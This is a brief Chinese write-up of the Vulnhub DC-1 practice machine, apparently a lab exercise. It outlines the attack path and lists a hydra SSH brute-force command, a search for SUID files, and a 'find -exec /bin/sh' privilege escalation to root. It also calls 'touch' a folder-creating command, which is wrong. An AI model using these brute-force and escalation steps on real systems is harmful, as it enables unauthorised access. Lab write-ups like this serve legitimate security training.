Vulnhub——DC-1渗透
一、涉及漏洞类型
CMS漏洞
SUID提权
二、渗透思路
主机发现 => 端口扫描 => 访问web服务 => 判断cms => 利用已知漏洞getshell => 拿到flag1 => 配置文件找到flag2和数据库账户密码 => 登录数据库更新管理员密码 => 登录web服务 => 拿到flag3 => 暴破ssh登录 => 拿到flag4 => SUID提权拿到最终flag
三、学到知识点
1.hydra
hydra -l flag4 -P /Users/john-1.8.0/run/password.lst ssh://192.168.43.237
使用hydra + John the Ripper的密码本进行暴破
2.SUID提权
suid作用是让普通用户可以以root(或其他)的用户角色运行只有root(或其他)账号才能运行的程序或命令,或程序命令对应本来没有权限操作的文件等。(注意和su及sudo的区别),suid为某一个命令设置特殊权限(使用者为所有人)
find / -perm -u=s -type f 2>/dev/null
查找设置了SUID的文件
3.touch
touch test
新建一个文件夹
4.find
find path -option 【 -print 】 【 -exec -ok |xargs |grep 】 【 command {} \; 】
1)path:要查找的目录路径。~ 表示$HOME目录 . 表示当前目录 / 表示根目录
2)print:表示将结果输出到标准输出
3)exec:对匹配的文件执行该参数所给出的shell命令。
4)ok:与exec作用相同, 区别在于,在执行命令之前,都会给出提示,让用户确认是否执行
5)|xargs 与exec作用相同 ,起承接作用 ,区别在于 |xargs 主要用于承接删除操作 ,而 -exec 都可用 如复制、移动、重命名等
6)options :表示查找方式
5.
find test -exec "/bin/sh" \;
四、参考:
https://blog.csdn.net/weixin_45605352/article/details/119348522
https://blog.csdn.net/weixin_45996361/article/details/122718931